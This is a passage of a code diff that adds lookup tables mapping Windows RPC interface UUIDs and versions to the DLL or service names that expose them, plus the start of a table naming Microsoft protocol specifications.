+b"\x60\xf4\x82\x4f\x21\x0e\xcf\x11\x90\x9e\x00\x80\x5f\x48\xa1\x35\x04\x00": "nntpsvc.dll", +b"\x7d\xce\x54\x5f\x79\x5b\x75\x41\x85\x84\xcb\x65\x31\x3a\x0e\x98\x01\x00": "appinfo.dll", +b"\xdc\x3f\x27\x82\x2a\xe3\xc3\x18\x3f\x78\x82\x79\x29\xdc\x23\xea\x00\x00": "wevtsvc.dll", +b"\x3a\xcf\xe0\x16\x04\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x01\x00": "ntdsbsrv.dll", +b"\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x01\x28\x92\x02\x01\x62\x00\x00": "browser.dll", +b"\xd6\x09\x48\x48\x39\x42\x1b\x47\xb5\xbc\x61\xdf\x8c\x23\xac\x48\x01\x00": "lsm.exe", +b"\xe8\x04\xe6\x58\xdb\x9a\x2e\x4d\xa4\x64\x3b\x06\x83\xfb\x14\x80\x01\x00": "appinfo.dll", +b"\x57\x72\xd4\xa2\xf7\x12\xeb\x4b\x89\x81\x0e\xbf\xa9\x35\xc4\x07\x01\x00": "p2psvc.dll", +b"\x1e\xdd\x5b\x6b\x8c\x52\x2c\x42\xaf\x8c\xa4\x07\x9b\xe4\xfe\x48\x01\x00": "FwRemoteSvr.dll", +b"\x75\x21\xc8\x51\x4e\x84\x50\x47\xb0\xd8\xec\x25\x55\x55\xbc\x06\x01\x00": "SLsvc.exe", +b"\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xac\x01\x00": "samsrv.dll", +b"\xc0\x47\xdf\xb3\x5a\xa9\xcf\x11\xaa\x26\x00\xaa\x00\xc1\x48\xb9\x09\x00": "mspadmin.exe - Microsoft ISA Server", +b"\x00\xac\x0a\xf5\xf3\xc7\x8e\x42\xa0\x22\xa6\xb7\x1b\xfb\x9d\x43\x01\x01": "cryptsvc.dll", +b"\x65\x31\x0a\xea\x34\x48\xd2\x11\xa6\xf8\x00\xc0\x4f\xa3\x46\xcc\x04\x00": "FXSSVC.exe", +b"\x33\xa2\x74\xd6\x29\x58\xdd\x49\x90\xf0\x60\xcf\x9c\xeb\x71\x29\x01\x00": "ipnathlp.dll", +b"\xf7\xaf\xbe\xf6\x19\x1e\xbb\x4f\x9f\x8f\xb8\x9e\x20\x18\x33\x7c\x01\x00": "wevtsvc.dll", +b"\x70\x0d\xec\xec\x03\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x02\x00": "ntdsbsrv.dll", +b"\x7c\xda\x83\x4f\xe8\xd2\x11\x98\x07\x00\xc0\x4f\x8e\xc8\x50\x02\x00\x00": "sfc.dll", +b"\x80\x92\xea\x46\xbf\x5b\x5e\x44\x83\x1d\x41\xd0\xf6\x0f\x50\x3a\x01\x00": "ifssvc.exe", +b"\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03\x02\x00": "services.exe", +b"\x66\x9f\x9b\x62\x6c\x55\xd1\x11\x8d\xd2\x00\xaa\x00\x4a\xbd\x5e\x03\x00": "sens.dll", +b"\x1c\x02\x0c\xa0\xe2\x2b\xd2\x11\xb6\x78\x00\x00\xf8\x7a\x8f\x8e\x01\x00": "ntfrs.exe", +b"\x3e\xca\x86\xc3\x61\x90\x72\x4a\x82\x1e\x49\x8d\x83\xbe\x18\x8f\x01\x01": "audiosrv.dll", +b"\x6d\xa5\x6e\xe7\x3f\x45\xcf\x11\xbf\xec\x08\x00\x2b\xe2\x3f\x2f\x02\x01": "resrcmon.exe", +b"\xe1\xbf\x72\x4a\x94\x92\xda\x11\xa7\x2b\x08\x00\x20\x0c\x9a\x66\x01\x00": "rdpinit.exe", +b"\x7c\x5f\xc4\xa2\x32\x7d\xad\x46\x96\xf5\xad\xaf\xb4\x86\xbe\x74\x01\x00": "services.exe", +b"\x01\x6b\x77\x45\x56\x59\x85\x44\x9f\x80\xf4\x28\xf7\xd6\x01\x29\x02\x00": "dnsrslvr.dll", +b"\x96\x7b\x9b\x6c\xa8\x45\xca\x4c\x9e\xb3\xe2\x1c\xcf\x8b\x5a\x89\x01\x00": "umpo.dll", +b"\x15\x04\x42\x9d\xfb\xb8\x4a\x4f\x8c\x53\x45\x02\xea\xd3\x0c\xa9\x01\x00": "PlaySndSrv.dll", +b"\x50\x38\xcd\x15\xca\x28\xce\x11\xa4\xe8\x00\xaa\x00\x61\x16\xcb\x01\x00": "PeerDistSvc.dll", +b"\x20\xe5\x98\xa3\x9a\xd5\xdd\x4b\xaa\x7a\x3c\x1e\x03\x03\xa5\x11\x01\x00": "IKEEXT.DLL", +b"\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa\x03\x00": "rpcss.dll", +b"\x00\x7c\xda\x83\x4f\xe8\xd2\x11\x98\x07\x00\xc0\x4f\x8e\xc8\x50\x02\x00": "sfc_os.dll", +b"\xf2\xdc\x51\x4a\x3a\x5c\xd2\x4d\x84\xdb\xc3\x80\x2e\xe7\xf9\xb7\x01\x00": "ntdsai.dll", +b"\x82\x06\xf7\x1f\x51\x0a\xe8\x30\x07\x6d\x74\x0b\xe8\xce\xe9\x8b\x01\x00": "taskcomp.dll", +b"\x00\xb9\x99\x3f\x87\x4d\x1b\x10\x99\xb7\xaa\x00\x04\x00\x7f\x07\x01\x00": "ssmsrpc.dll - Microsoft SQL Server", +b"\x20\x17\x82\x5b\x3b\xf6\xd0\x11\xaa\xd2\x00\xc0\x4f\xc3\x24\xdb\x01\x00": "dhcpssvc.dll", +b"\x22\xc4\xa1\x4d\x3d\x94\xd1\x11\xac\xae\x00\xc0\x4f\xc2\xaa\x3f\x01\x00": "trksvr.dll", +b"\x74\xe9\xa5\x1a\x82\x62\x8d\x4e\x9c\x96\x40\x18\x6e\x89\xd2\x80\x01\x00": "scss.exe", +b"\x94\x73\x92\x1a\x2e\x35\x53\x45\xae\x3f\x7c\xf4\xaa\xfc\xa6\x20\x01\x00": "wdssrv.dll", +b"\x66\xf6\x8c\x04\x42\xab\xb4\x42\x89\x75\x13\x57\x01\x8d\xec\xb3\x01\x00": "ws2_32.dll", +b"\x3a\xcf\xe0\x16\x04\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x02\x00": "ntdsbsrv.dll", +b"\x02\x00\x00\x00\x01\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x69\x01\x00": "kdcsvc.dll", +b"\xb0\x52\x8e\x37\xa9\xc0\xcf\x11\x82\x2d\x00\xaa\x00\x51\xe4\x0f\x01\x00": "taskcomp.dll", +b"\xe0\x6d\x7a\x8c\x8d\x78\xd0\x11\x9e\xdf\x44\x45\x53\x54\x00\x00\x02\x00": "wiaservc.dll", +b"\x05\x81\xa7\x3c\xa3\xa3\x68\x4a\xb4\x58\x1a\x60\x6b\xab\x8f\xd6\x01\x00": "mpnotify.exe", +b"\x2e\xa0\x8a\xb5\x84\x28\x97\x4e\x81\x76\x4e\xe0\x6d\x79\x41\x84\x01\x00": "sysmain.dll", +b"\x95\x4f\x25\xd4\xc3\x08\xcc\x4f\xb2\xa6\x0b\x65\x13\x77\xa2\x9c\x01\x00": "wwansvc.dll", +b"\x6e\x2c\xf4\xc3\xcc\xd4\x5a\x4e\x93\x8b\x9c\x5e\x8a\x5d\x8c\x2e\x01\x00": "wlanmsm.dll", +b"\x53\x0c\x19\xf3\x0c\x4e\x1a\x49\xaa\xd3\x2a\x7c\xeb\x7e\x25\xd4\x01\x00": "vpnikeapi.dll", +b"\x26\xc0\xe1\xac\x3f\x8b\x11\x47\x89\x18\xf3\x45\xd1\x7f\x5b\xff\x01\x00": "lsasrv.dll", +b"\xc0\xc4\x55\xae\xce\x64\xdd\x11\xad\x8b\x08\x00\x20\x0c\x9a\x66\x01\x00": "bdesvc.dll", +b"\xc4\x0c\x3c\xe3\x82\x04\x1a\x10\xbc\x0c\x02\x60\x8c\x6b\xa2\x18\x01\x00": "locator.exe", +b"\x0e\x3b\x6c\x50\xd1\x4b\x56\x4c\x88\xc0\x49\xa2\x0e\xd4\xb5\x39\x01\x00": "milcore.dll", +b"\x3e\x8e\xb0\x2e\x9f\x63\xba\x4f\x97\xb1\x14\xf8\x78\x96\x10\x76\x01\x00": "gpsvc.dll", +b"\x66\x9f\x9b\x62\x6c\x55\xd1\x11\x8d\xd2\x00\xaa\x00\x4a\xbd\x5e\x02\x00": "sens.dll", +b"\xb5\x6d\xac\xc9\xb7\x82\x55\x4e\xae\x8a\xe4\x64\xed\x7b\x42\x77\x01\x00": "sysntfy.dll", +b"\x98\x46\xbc\xa0\xd7\xb8\x30\x43\xa2\x8f\x77\x09\xe1\x8b\x61\x08\x04\x00": "Sens.dll", +b"\x1e\xc9\x31\x3f\x45\x25\x7b\x4b\x93\x11\x95\x29\xe8\xbf\xfe\xf6\x01\x00": "p2psvc.dll", +b"\x3e\xca\x86\xc3\x61\x90\x72\x4a\x82\x1e\x49\x8d\x83\xbe\x18\x8f\x02\x00": "audiosrv.dll", +b"\x3e\xca\x86\xc3\x61\x90\x72\x4a\x82\x1e\x49\x8d\x83\xbe\x18\x8f\x02\x02": "audiosrv.dll", +b"\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0\x4f\xb6\xe6\xfc\x01\x00": "msgsvc.dll", +b"\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x74\x53\x2d\x01\x00": "dhcpssvc.dll", +b"\xb8\xd0\x48\xe2\x15\xbf\xcf\x11\x8c\x5e\x08\x00\x2b\xb4\x96\x49\x02\x00": "clussvc.exe", +b"\x78\xad\xbc\x1c\x0b\xdf\x34\x49\xb5\x58\x87\x83\x9e\xa5\x01\xc9\x00\x00": "lsasrv.dll", +b"\x87\x76\xcb\xc8\xd3\xe6\xd2\x11\xa9\x58\x00\xc0\x4f\x68\x2e\x16\x01\x00": "WebClnt.dll", +b"\x88\xd4\x81\xc6\x50\xd8\xd0\x11\x8c\x52\x00\xc0\x4f\xd9\x0f\x7e\x01\x00": "lsasrv.dll", +b"\x80\x35\x5b\x5b\xe0\xb0\xd1\x11\xb9\x2d\x00\x60\x08\x1e\x87\xf0\x01\x00": "mqqm.dll", +b"\xf0\x09\x8f\xed\xb7\xce\x11\xbb\xd2\x00\x00\x1a\x18\x1c\xad\x00\x00\x00": "mprdim.dll", +b"\xd8\x5d\xe6\x12\x7f\x88\xef\x41\x91\xbf\x8d\x81\x6c\x42\xc2\xe7\x01\x00": "winlogon.exe", +b"\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0\x4f\xb6\x36\xfc\x01\x00": "msgsvc.dll", +b"\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03\x01\x00": "regsvc.dll", +b"\x03\xd7\xfd\x17\x27\x18\x34\x4e\x79\xd4\x24\xa5\x5c\x53\xbb\x37\x01\x00": "msgsvc.dll", +b"\x1c\x95\x57\x33\xd1\xa1\xdb\x47\xa2\x78\xab\x94\x5d\x06\x3d\x03\x01\x00": "LBService.dll", +b"\xab\xbe\x00\xc1\x3a\xd3\x4b\x4a\xbf\x23\xbb\xef\x46\x63\xd0\x17\x01\x00": "wcncsvc.dll", +b"\xc4\xfc\x7b\x82\xb4\x38\xcd\x4a\x92\xe4\x21\xe1\x50\x6b\x85\xfb\x01\x00": "SLsvc.exe", +b"\x00\xf0\x09\x8f\xed\xb7\xce\x11\xbb\xd2\x00\x00\x1a\x18\x1c\xad\x00\x00": "mprdim.dll", +b"\x4b\xa0\x12\x72\x63\xb4\x2e\x40\x96\x49\x2b\xa4\x77\x39\x46\x76\x01\x00": "umrdp.dll", +b"\x20\x65\x5f\x2f\x46\xca\x67\x10\xb3\x19\x00\xdd\x01\x06\x62\xda\x01\x00": "tapisrv.dll", +b"\xa0\x9e\xc0\x69\x09\x4a\x1b\x10\xae\x4b\x08\x00\x2b\x34\x9a\x02\x00\x00": "ole32.dll", +b"\xd0\x3f\x14\x88\x8d\xc2\x2b\x4b\x8f\xef\x8d\x88\x2f\x6a\x93\x90\x01\x00": "lsm.exe", +b"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00": "rpcss.dll", +b"\x6c\xfc\x79\xde\x6f\xdc\xc7\x43\xa4\x8e\x63\xbb\xc8\xd4\x00\x9d\x01\x00": "rdpclip.exe", +b"\x41\x82\xb5\x68\x59\xc2\x03\x4f\xa2\xe5\xa2\x65\x1d\xcb\xc9\x30\x01\x00": "cryptsvc.dll", +b"\x80\xa9\x88\x10\xe5\xea\xd0\x11\x8d\x9b\x00\xa0\x24\x53\xc3\x37\x01\x00": "mqqm.dll", +b"\xcf\x0b\xa7\x7e\xaf\x48\x6a\x4f\x89\x68\x6a\x44\x07\x54\xd5\xfa\x01\x00": "nsisvc.dll", +b"\xe0\xca\x02\xec\xe0\xb9\xd2\x11\xbe\x62\x00\x20\xaf\xed\xdf\x63\x01\x00": "mq1repl.dll", +b"\xb3\x8b\x0b\x59\xf6\x4e\xa4\x4c\x83\xcf\xbe\x06\xc4\x07\x86\x74\x01\x00": "PSIService.exe", +b"\xce\x9f\x75\x89\x25\x5a\x86\x40\x89\x67\xde\x12\xf3\x9a\x60\xb5\x01\x00": "tssdjet.dll", +b"\x5d\x2c\x95\x25\x76\x79\xa1\x4a\xa3\xcb\xc3\x5f\x7a\xe7\x9d\x1b\x01\x00": "wlansvc.dll", +b"\xc5\x41\x19\xdf\x89\xfe\x79\x4e\xbf\x10\x46\x36\x57\xac\xf4\x4d\x01\x00": "efssvc.dll", +b"\xc1\xcd\x1a\x8f\x4d\x75\xeb\x43\x96\x29\xaa\x16\x20\x92\x8e\x65\x00\x00": "IMEPADSM.DLL", +b"\xdf\x76\x49\x65\x98\x14\x56\x40\xa1\x5e\xcb\x4e\x87\x58\x4b\xd8\x01\x00": "emdmgmt.dll", +b"\xe0\x42\xc7\x4f\x10\x4a\xcf\x11\x82\x73\x00\xaa\x00\x4a\xe6\x73\x03\x00": "dfssvc.exe", +b"\xfa\xdb\x6e\x0b\x24\x4a\xc6\x4f\x8a\x23\x94\x2b\x1e\xca\x65\xd1\x01\x00": "spoolsv.exe", +b"\xc8\xb7\xd4\x12\xd5\x77\xd1\x11\x8c\x24\x00\xc0\x4f\xa3\x08\x0d\x01\x00": "lserver.dll", +b"\x44\xaf\x7d\x8c\xdc\xb6\xd1\x11\x9a\x4c\x00\x20\xaf\x6e\x7c\x57\x01\x00": "appmgmts.dll", +b"\xae\x99\x86\x9b\x44\x0e\xb1\x47\x8e\x7f\x86\xa4\x61\xd7\xec\xdc\x00\x00": "rpcss.dll", +b"\x84\x65\x0a\x0b\x0f\x9e\xcf\x11\xa3\xcf\x00\x80\x5f\x68\xcb\x1b\x01\x01": "rpcss.dll", +b"\xa2\x9c\x14\x93\x3b\x97\xd1\x11\x8c\x39\x00\xc0\x4f\xb9\x84\xf9\x00\x00": "scecli.dll", +b"\x7d\x25\x13\xfc\x67\x55\xea\x4d\x89\x8d\xc6\xf9\xc4\x84\x15\xa0\x01\x00": "mqqm.dll", +b"\x82\x26\xb9\x2f\x99\x65\xdc\x42\xae\x13\xbd\x2c\xa8\x9b\xd1\x1c\x01\x00": "MPSSVC.dll", +b"\x76\x22\x3a\x33\x00\x00\x00\x00\x0d\x00\x00\x80\x9c\x00\x00\x00\x03\x00": "rpcrt4.dll", +b"\xf0\x0e\xd7\xd6\x3b\x0e\xcb\x11\xac\xc3\x08\x00\x2b\x1d\x29\xc4\x01\x00": "locator.exe", +b"\xdd\x34\x91\x1a\x39\x7b\xba\x45\xad\x88\x44\xd0\x1c\xa4\x7f\x28\x01\x00": "mqqm.dll", +b"\xfe\x95\x31\x9b\x03\xd6\xd1\x43\xa0\xd5\x90\x72\xd7\xcd\xe1\x22\x01\x00": "tssdjet.dll", +b"\x55\x1a\x20\x6f\x4d\xa2\x5f\x49\xaa\xc9\x2f\x4f\xce\x34\xdf\x98\x01\x00": "iphlpsvc.dll", +b"\x5f\x2e\x7e\x89\xf3\x93\x76\x43\x9c\x9c\xfd\x22\x77\x49\x5c\x27\x01\x00": "dfsrmig.exe", +b"\x90\x2c\xfe\x98\x42\xa5\xd0\x11\xa4\xef\x00\xa0\xc9\x06\x29\x10\x01\x00": "advapi32.dll", +b"\x0c\xc5\xad\x30\xbc\x5c\xce\x46\x9a\x0e\x91\x91\x47\x89\xe2\x3c\x01\x00": "nrpsrv.dll", +b"\x1e\x24\x2f\x41\x2a\xc1\xce\x11\xab\xff\x00\x20\xaf\x6e\x7a\x17\x00\x02": "rpcss.dll", +b"\xe6\x53\x3a\x9f\xb1\xcb\x54\x4e\x87\x8e\xaf\x9f\x82\x3a\xa3\xf1\x01\x00": "MpRtMon.dll", +b"\xa8\xe5\xfc\x1d\x8a\xdd\x33\x4e\xaa\xce\xf6\x03\x92\x2f\xd9\xe7\x00\x01": "wpcsvc.dll", +b"\xf0\x0e\xd7\xd6\x3b\x0e\xcb\x11\xac\xc3\x08\x00\x2b\x1d\x29\xc3\x01\x00": "locator.exe", +b"\x46\xd7\xd0\xe3\xaf\xd2\xfd\x40\x8a\x7a\x0d\x70\x78\xbb\x70\x92\x01\x00": "qmgr.dll", +b"\x5a\x23\xb5\xc6\x13\xe4\x1d\x48\x9a\xc8\x31\x68\x1b\x1f\xaa\xf5\x01\x01": "SCardSvr.dll", +b"\x5a\x23\xb5\xc6\x13\xe4\x1d\x48\x9a\xc8\x31\x68\x1b\x1f\xaa\xf5\x01\x00": "SCardSvr.dll", +b"\x69\x45\x81\x7d\xb3\x35\x50\x48\xbb\x32\x83\x03\x5f\xce\xbf\x6e\x01\x00": "ias.dll", +b"\x41\xea\x25\x48\xe3\x51\x2a\x4c\x84\x06\x8f\x2d\x26\x98\x39\x5f\x01\x00": "userenv.dll", +b"\xc4\xfe\xfc\x99\x60\x52\x1b\x10\xbb\xcb\x00\xaa\x00\x21\x34\x7a\x00\x00": "rpcss.dll", +b"\xc5\x28\x47\x3c\xab\xf0\x8b\x44\xbd\xa1\x6c\xe0\x1e\xb0\xa6\xd5\x01\x00": "dhcpcsvc.dll", +b"\xe0\x8e\x20\x41\x70\xe9\xd1\x11\x9b\x9e\x00\xe0\x2c\x06\x4c\x39\x01\x00": "mqqm.dll", +b"\xbf\x7b\x40\xcb\x4f\xc1\xd9\x4c\x8f\x55\xcb\xb0\x81\x46\x59\x8c\x00\x00": "IMJPDCT.EXE", +b"\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb\x01\x00": "netlogon.dll", +b"\x30\x4c\xda\x83\x3a\xea\xcf\x11\x9c\xc1\x08\x00\x36\x01\xe5\x06\x01\x00": "nfsclnt.exe", +b"\x1f\xa7\x37\x21\x5e\xbb\x29\x4e\x8e\x7e\x2e\x46\xa6\x68\x1d\xbf\x09\x00": "wspsrv.exe - Microsoft ISA Server", +b"\x1e\x67\xe9\xc0\xc6\x33\x38\x44\x94\x64\x56\xb2\xe1\xb1\xc7\xb4\x01\x00": "wbiosrvc.dll", +b"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00": "rpcrt4.dll", +b"\x8b\x3c\xf1\x6a\x44\x08\x83\x4c\x90\x64\x18\x92\xba\x82\x55\x27\x01\x00": "tssdis.exe", +b"\x55\x51\xd8\xec\x3a\xcc\x10\x4f\xaa\xd5\x9a\x9a\x2b\xf2\xef\x0c\x01\x00": "termsrv.dll", +b"\xe8\x98\x8b\xbb\xdd\x84\xe7\x45\x9f\x34\xc3\xfb\x61\x55\xee\xed\x01\x00": "vaultsvc.dll", +b"\x86\xb1\x49\xd0\x4f\x81\xd1\x11\x9a\x3c\x00\xc0\x4f\xc9\xb2\x32\x01\x00": "ntfrs.exe", +b"\x5d\x2c\x95\x25\x76\x79\xa1\x4a\xa3\xcb\xc3\x5f\x7a\xe7\x9d\x1b\x01\x01": "wlansvc.dll", +b"\x7f\x0b\xfe\x64\xf5\x9e\x53\x45\xa7\xdb\x9a\x19\x75\x77\x75\x54\x01\x00": "rpcss.dll", +b"\x86\xd4\xdc\x68\x9e\x66\xd1\x11\xab\x0c\x00\xc0\x4f\xc2\xdc\xd2\x02\x00": "ismserv.exe", +b"\xc3\x26\xf2\x76\x14\xec\x25\x43\x8a\x99\x6a\x46\x34\x84\x18\xae\x01\x00": "winlogon.exe", +b"\x23\x05\x7a\xfd\x70\xdc\xdd\x43\x9b\x2e\x9c\x5e\xd4\x82\x25\xb1\x01\x00": "appinfo.dll", +b"\x40\xfd\x2c\x34\x6c\x3c\xce\x11\xa8\x93\x08\x00\x2b\x2e\x9c\x6d\x00\x00": "llssrv.exe", +b"\x84\xd8\xb6\x8f\x88\x23\xd0\x11\x8c\x35\x00\xc0\x4f\xda\x27\x95\x04\x01": "w32time.dll", +b"\x9b\x06\x33\xae\xa8\xa2\xee\x46\xa2\x35\xdd\xfd\x33\x9b\xe2\x81\x01\x00": "spoolsv.exe", +b"\x26\xb5\x55\x1d\x37\xc1\xc5\x46\xab\x79\x63\x8f\x2a\x68\xe8\x69\x01\x00": "rpcss.dll", +b"\xa0\xaa\x17\x6e\x47\x1a\xd1\x11\x98\xbd\x00\x00\xf8\x75\x29\x2e\x02\x00": "clussvc.exe", +b"\xdf\x5f\xe9\xbd\xe0\xee\xde\x45\x9e\x12\xe5\xa6\x1c\xd0\xd4\xfe\x01\x00": "termsrv.dll", +b"\xac\xbe\x00\xc1\x3a\xd3\x4b\x4a\xbf\x23\xbb\xef\x46\x63\xd0\x17\x01\x00": "wcncsvc.dll", +b"\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab\x01\x00": "spoolsv.exe", +b"\x06\x50\x7b\x8a\x13\xcc\xdb\x11\x97\x05\x00\x50\x56\xc0\x00\x08\x01\x00": "appidsvc.dll", +b"\x20\x60\xae\x91\x3c\x9e\xcf\x11\x8d\x7c\x00\xaa\x00\xc0\x91\xbe\x00\x00": "certsrv.exe", +b"\x16\xbb\x74\x81\x1b\x57\x38\x4c\x83\x86\x11\x02\xb4\x49\x04\x4a\x01\x00": "p2psvc.dll", +b"\x36\x00\x61\x20\x22\xfa\xcf\x11\x98\x23\x00\xa0\xc9\x11\xe5\xdf\x01\x00": "rasmans.dll", +b"\x70\x0d\xec\xec\x03\xa6\xd0\x11\x96\xb1\x00\xa0\xc9\x1e\xce\x30\x01\x00": "ntdsbsrv.dll", +b"\x1c\xef\x74\x0a\xa4\x41\x06\x4e\x83\xae\xdc\x74\xfb\x1c\xdd\x53\x01\x00": "schedsvc.dll", +b"\x25\x04\x49\xdd\x25\x53\x65\x45\xb7\x74\x7e\x27\xd6\xc0\x9c\x24\x01\x00": "BFE.DLL", +b"\x7c\x5a\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x15\x00": "ntdsa.dll", +b"\xa0\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00": "rpcss.dll", +b"\x49\x59\xd3\x86\xc9\x83\x44\x40\xb4\x24\xdb\x36\x32\x31\xfd\x0c\x01\x00": "schedsvc.dll", +b"\x35\x08\x22\x11\x26\x5b\x94\x4d\xae\x86\xc3\xe4\x75\xa8\x09\xde\x01\x00": "lsasrv.dll", +b"\xa8\x66\x00\xc8\x79\x75\xfc\x44\xb9\xb2\x84\x66\x93\x07\x91\xb0\x01\x00": "umrdp.dll", +b"\xab\x59\xec\xf1\xa9\x4c\x30\x4c\xb2\xd0\x54\xef\x1d\xb4\x41\xb7\x01\x00": "iertutil.dll", +b"\xba\xaa\x67\x52\x49\x4f\x53\x46\x8e\x26\xd1\xe1\x1f\x3f\x2a\xd9\x01\x00": "termsrv.dll", +b"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f\x00\x00": "rpcss.dll", +b"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f\x00\x02": "rpcss.dll", +b"\x38\x47\xaf\x3f\x21\x3a\x07\x43\xb4\x6c\xfd\xda\x9b\xb8\xc0\xd5\x01\x02": "audiosrv.dll", +b"\x38\x47\xaf\x3f\x21\x3a\x07\x43\xb4\x6c\xfd\xda\x9b\xb8\xc0\xd5\x01\x01": "audiosrv.dll", +b"\x20\x32\x5f\x2f\x26\xc1\x76\x10\xb5\x49\x07\x4d\x07\x86\x19\xda\x01\x02": "netdde.exe", +b"\xbf\x11\x9d\x7f\xb9\x7f\x6b\x43\xa8\x12\xb2\xd5\x0c\x5d\x4c\x03\x01\x00": "MPSSVC.dll", +b"\xbf\x52\x5a\xb2\xdd\xe5\x4a\x4f\xae\xa6\x8c\xa7\x27\x2a\x0e\x86\x01\x00": "keyiso.dll", +b"\x04\x22\x11\x4b\x19\x0e\xd3\x11\xb4\x2b\x00\x00\xf8\x1f\xeb\x9f\x01\x00": "ssdpsrv.dll", +b"\x97\xb2\xee\x04\xf4\xcb\x6b\x46\x8a\x2a\xbf\xd6\xa2\xf1\x0b\xba\x01\x00": "efssvc.dll", +b"\x40\xb2\x9b\x20\x19\xb9\xd1\x11\xbb\xb6\x00\x80\xc7\x5e\x4e\xc1\x01\x00": "irmon.dll", +b"\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09\x01\x00": "spoolsv.exe", +b"\x4a\xa5\xbb\x06\x05\xbe\xf9\x49\xb0\xa0\x30\xf7\x90\x26\x10\x23\x01\x00": "wscsvc.dll", +b"\xa6\xb2\xdd\x1b\xc3\xc0\xbe\x41\x87\x03\xdd\xbd\xf4\xf0\xe8\x0a\x01\x00": "dot3svc.dll", +b"\x82\x15\x41\xaa\xdf\x9b\xfb\x48\xb4\x2b\xfa\xa1\xee\xe3\x39\x49\x01\x00": "nlasvc.dll", +b"\xfa\x9d\xd7\xd2\x00\x34\xd0\x11\xb4\x0b\x00\xaa\x00\x5f\xf5\x86\x01\x00": "dmadmin.exe", +b"\x12\xfc\x99\x60\xff\x3e\xd0\x11\xab\xd0\x00\xc0\x4f\xd9\x1a\x4e\x03\x00": "FXSAPI.dll", +b"\x1e\x24\x2f\x41\x2a\xc1\xce\x11\xab\xff\x00\x20\xaf\x6e\x7a\x17\x00\x00": "rpcss.dll", +b"\xd5\x33\x9a\x2c\xdb\xf1\x2d\x47\x84\x64\x42\xb8\xb0\xc7\x6c\x38\x01\x00": "tbssvc.dll", +b"\x30\x7c\xde\x3d\x5d\x16\xd1\x11\xab\x8f\x00\x80\x5f\x14\xdb\x40\x01\x00": "services.exe", +b"\x86\xb1\x49\xd0\x4f\x81\xd1\x11\x9a\x3c\x00\xc0\x4f\xc9\xb2\x32\x01\x01": "ntfrs.exe", +b"\x94\x8c\x95\x95\x24\xa4\x55\x40\xb6\x2b\xb7\xf4\xd5\xc4\x77\x70\x01\x00": "winlogon.exe", +b"\xe3\x31\x67\x32\xc0\xc1\x69\x4a\xae\x20\x7d\x90\x44\xa4\xea\x5c\x01\x00": "profsvc.dll", +b"\x18\x5a\xcc\xf5\x64\x42\x1a\x10\x8c\x59\x08\x00\x2b\x2f\x84\x26\x38\x00": "ntdsai.dll", +b"\x0f\x6a\xe9\x4b\x52\x9f\x29\x47\xa5\x1d\xc7\x06\x10\xf1\x18\xb0\x01\x00": "wbiosrvc.dll", +b"\x80\x42\xad\x82\x6b\x03\xcf\x11\x97\x2c\x00\xaa\x00\x68\x87\xb0\x02\x00": "infocomm.dll", +b"\x87\x04\x26\x1f\x29\xba\x13\x4f\x92\x8a\xbb\xd2\x97\x61\xb0\x83\x01\x00": "termsrv.dll", +b"\x70\x07\xf7\x18\x64\x8e\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x00\x00": "ole32.dll", +b"\xc0\xeb\x4f\xfa\x91\x45\xce\x11\x95\xe5\x00\xaa\x00\x51\xe5\x10\x04\x00": "autmgr32.exe", +b"\x10\xca\x8c\x70\x69\x95\xd1\x11\xb2\xa5\x00\x60\x97\x7d\x81\x18\x01\x00": "mqdssrv.dll", +b"\x28\x2c\xf5\x45\x9f\x7f\x1a\x10\xb5\x2b\x08\x00\x2b\x2e\xfa\xbe\x01\x00": "WINS.EXE", +b"\x31\xa3\x59\x2f\x7d\xbf\xcb\x48\x9e\x5c\x7c\x09\x0d\x76\xe8\xb8\x01\x00": "termsrv.dll", +b"\x61\x26\x45\x4a\x90\x82\x36\x4b\x8f\xbe\x7f\x40\x93\xa9\x49\x78\x01\x00": "spoolsv.exe", +} + +KNOWN_PROTOCOLS = { +'52C80B95-C1AD-4240-8D89-72E9FA84025E':'[MC-CCFG]: Server Cluster:', +'FA7660F6-7B3F-4237-A8BF-ED0AD0DCBBD9':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'450386DB-7409-4667-935E-384DBBEE2A9E':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'832A32F7-B3EA-4B8C-B260-9A2923001184':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'2D9915FB-9D42-4328-B782-1B46819FAB9E':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'0DD8A158-EBE6-4008-A1D9-B7ECC8F1104B':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'0716CAF8-7D05-4A46-8099-77594BE91394':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', 